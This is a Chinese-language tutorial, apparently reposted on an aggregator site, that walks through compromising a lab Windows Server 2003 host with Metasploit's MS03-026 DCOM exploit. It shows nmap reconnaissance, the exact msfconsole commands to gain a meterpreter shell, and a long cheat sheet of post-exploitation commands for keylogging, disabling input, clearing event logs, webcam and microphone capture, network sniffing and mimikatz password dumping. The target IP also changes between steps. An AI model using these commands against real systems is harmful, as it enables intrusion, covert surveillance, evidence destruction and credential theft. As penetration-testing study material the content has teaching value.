网络安全kali web安全 Kali之msf简单的漏洞利用

这篇具有很好参考价值的文章主要介绍了网络安全kali web安全 Kali之msf简单的漏洞利用。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

信息收集

靶机的IP地址为:192.168.173.136

利用nmap工具扫描其开放端口、系统等
网络安全kali web安全 Kali之msf简单的漏洞利用
整理一下目标系统的相关信息

系统版本:Windows server 2003

开放的端口及服务:

21/tcp   	ftp
135/tcp  	msrpc
139/tcp  	netbios-ssn
445/tcp  	microsoft-ds
777/tcp  	multiling-http
1025/tcp 	NFS-or-IIS
1026/tcp 	LSA-or-nterm
1029/tcp 	ms-lsa
1030/tcp 	iad1
6002/tcp 	X11:2
7001/tcp 	afs3-callback
7002/tcp 	afs3-prserver
8099/tcp 	未知服务

漏洞分析

从扫描出的端口发现,目标主机开启了135端口,服务为msrpc(远程过程调用服务),即Windows的RPC服务。

​针对这个服务,我们就可以尝试去利用一下。

漏洞利用

kali机打开Metaspolit:

root@kali:~# msfconsole

查找所有跟Windows RPC相关的漏洞攻击:

msf5 > search dcom

网络安全kali web安全 Kali之msf简单的漏洞利用
使用MS-03-026 进行攻击:

msf5 > use exploit/windows/dcerpc/ms03_026_dcom 

为了实施攻击,查看漏洞攻击的选项和条件:

msf5 exploit(windows/dcerpc/ms03_026_dcom) > show options

网络安全kali web安全 Kali之msf简单的漏洞利用
知道攻击所需要的条件,接下来进行设置,只需要设置我们攻击的目标主机即可:

msf5 exploit(windows/dcerpc/ms03_026_dcom) > set RHOSTS 192.168.174.136
RHOSTS => 192.168.174.136

设置好攻击条件之后,接下来就进行攻击:

msf5 exploit(windows/dcerpc/ms03_026_dcom) > exploit 

网络安全kali web安全 Kali之msf简单的漏洞利用
执行攻击命令之后,我们获取到了目标主机的shell权限,现在,可以执行命令查看目标主机的一些东西,比如网络配置信息:

meterpreter > ipconfig

网络安全kali web安全 Kali之msf简单的漏洞利用
如需进一步攻击利用,可配合其他命令进一步操作。文章来源地址https://www.toymoban.com/news/detail-488585.html

meterpreter下相关命令

基本系统命令
——————————
shell			进入目标主机cmd shell
reboot			重启目标主机
shutdown		关闭目标主机
sysinfo			查看目标主机系统信息
background		将当前会话放置后台
info			查看已有信息模块
run				执行已有的模块,输入run后按tab键补全,会列出已有的脚本
clearav 		清除windows中的应用程序日志、系统日志、安全日志
ipconfig		查看网络配置信息
netstat			查看网络连接信息
getproxy		查看代理信息
route			查看路由
arp				查看arp信息
进程列表:
——————————
getuid			获取系统ID以及计算机名称
getpid			获取当前进程标识符
kill			结束进程
ps				列出正在运行中的进程
鼠标/键盘操作
——————————
keyscan_start	开启按键记录会话
keyscan_stop	终止按键记录会话
keyscan_dump	转储从目标主机捕获到的按键记录
uictl enable mouse 		启用鼠标
uictl disable mouse  	禁用鼠标
uictl enable keyboard	启用键盘
uictl disable keyboard  禁用键盘
会话
——————————
enumdesktops	列举所有可访问到的桌面和工作站
getdesktop		获取当前Meterpreter桌面
setdesktop		变更Meterpreter当前桌面
嗅探功能
——————————
use sniffer		加载嗅探功能
sniffer_interfaces   	查看网卡
sniffer_start	开始对网卡执行嗅探
sniffer_stats	查看状态
sniffer_stop	停止对网卡的嗅探
sniffer_dump	将捕获到的目标主机上的数据转储到本地
摄像头命令
——————————
webcam_list		列举系统所有的摄像头
webcam_snap		使用目标主机摄像头拍照
record_mic		从主机的默认麦克风中记录环境声音
webcam_stream	通过摄像头开启视频
远程桌面/截屏
——————————
enumdesktops	查看可用的桌面
getdesktop		获取当前meterpreter 关联的桌面
set_desktop		设置meterpreter关联的桌面  -h查看帮助
screenshot		截屏
use espia		或者使用espia模块截屏  然后输入screengrab
run vnc			使用vnc远程桌面连接
抓取密码
——————————
load mimikatz	查看帮助
wdigest			获取Wdigest密码
mimikatz_command -f samdump::hashes		执行mimikatz原始命令
mimikatz_command -f sekurlsa::searchPasswords

到了这里,关于网络安全kali web安全 Kali之msf简单的漏洞利用的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • KALI LINUX网络安全监控工具

    Snort是一款常用的开源入侵检测系统,被广泛应用于渗透测试、网络安全监控和入侵检测等领域。作为一名渗透测试工程师,了解Snort的原理、配置和使用方法是非常必要的。本文将详细介绍Snort的工作原理、配置方法和使用技巧,希望可以帮助读者更好的理解和应用这个工具

    2024年02月02日
    浏览(43)
  • 深入探索:Kali Linux 网络安全之旅

    目录 前言 访问官方网站 导航到下载页面 启动后界面操作 前言 \\\"Kali\\\" 可能指的是 Kali Linux,它是一种基于 Debian 的 Linux 发行版,专门用于渗透测试、网络安全评估、数字取证和相关的安全任务。Kali Linux 旨在提供一系列用于测试网络和系统安全性的工具,以及为安全专业人员

    2024年02月12日
    浏览(45)
  • Kali之MSF的MS08-067漏洞复现详解

    MSF即Metasploit Framework,是一个综合性的渗透测试工具,集成信息收集、漏洞扫描、漏洞利用以及提权等功能的工具。 目前安装的kali都自带MSF,可以直接在图形界面打开 也可以在kali的终端通过使用命令msfconsole来打开。 1)msf的安装目录: ┌──(kali㉿kali)-[~] └─$ ls /usr/shar

    2023年04月08日
    浏览(52)
  • Kali系统MSF模块暴力破解MySQL弱口令漏洞

    攻击环境使用KALI系统(使用虚拟机搭建)的Metasploit模块,msfconsole是metasploit中的一个工具,它集成了很多漏洞的利用的脚本,并且使用起来很简单的网络安全工具。 这里要特别强调:被攻击的环境必须开启mysql远程登陆服务,通常MySQL开启的端口号是3306,故而一般情况下要求

    2023年04月10日
    浏览(59)
  • 【文末送书】Kali Linux与网络安全

    欢迎关注博主 Mindtechnist 或加入【智能科技社区】一起学习和分享Linux、C、C++、Python、Matlab,机器人运动控制、多机器人协作,智能优化算法,滤波估计、多传感器信息融合,机器学习,人工智能等相关领域的知识和技术。关注公粽号 《机器和智能》 回复 “python项目

    2024年02月08日
    浏览(42)
  • 「Kali Linux」网络安全黑客自学、网络渗透(文末送书)

    目录 1.背景介绍 2.读者对象 3.随书资源 4.本书目录 5.本书概览 6.活动参与方式  对于企业网络安全建设工作的质量保障,业界普遍遵循PDCA(计划(Plan)、实施(Do)、检查(Check)、处理(Act))的方法论。近年来,网络安全攻防对抗演练发挥了越来越重要的作用。 企业的安

    2024年02月08日
    浏览(55)
  • 网络安全-01-VMware安装Kali&部署DVWA

    Kali linux是基于Debian的Linux的发行版,高级渗透测试及安全审核的工具。   kali linux: 1、包含600+渗透测试工具 2、完全免费 3、多语言 Kali linux镜像下载地址: http://old.kali.org/kali-images/ 📰 2.1 新建虚拟机 选择稍后安装操作系统,➡下一步 选择Linux, Debian 10.X 64位,➡下一步 重

    2024年02月12日
    浏览(37)
  • Kali Linux:网络与安全专家的终极武器

    Kali Linux,对于许多网络和安全专业人士来说,这是一个无人不知、无人不晓的名字。它是专为网络和安全测试、渗透测试以及数字取证等任务而设计的强大操作系统。本篇文章将深入介绍Kali Linux的特点、优势以及如何使用它来进行各种安全任务。 Kali Linux 是一款基于 Debian

    2024年02月06日
    浏览(39)
  • kali linux网络安全弱口令爆破常用命令(二)

    Kali Linux中的Hydra是一款强大的网络登录破解工具,它支持多种协议,如FTP、SSH、Telnet等。弱口令爆破是一种常见的网络攻击手段,通过尝试不同的用户名和密码组合来获取系统的访问权限。Hydra是一款强大的暴力破解工具,可以用于执行弱口令爆破。 1. 主机(Host): 要尝试

    2024年02月03日
    浏览(52)
  • 【网络安全 | Kali】基于Docker的Vulhub安装教程指南

    Vulhub的搭建基于docker及docker-compose 在安装开始前,必须升级权限才可进行docker安装 安装步骤如下: 报错是正常的,多次执行命令即可。 如果还报错,则运行如下命令: 再选择y 切换目录: 再查看目录: 以activemq中的CVE-2015-5254为例,先切换目录: 再切换到漏洞目录: 启动环

    2024年02月03日
    浏览(48)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包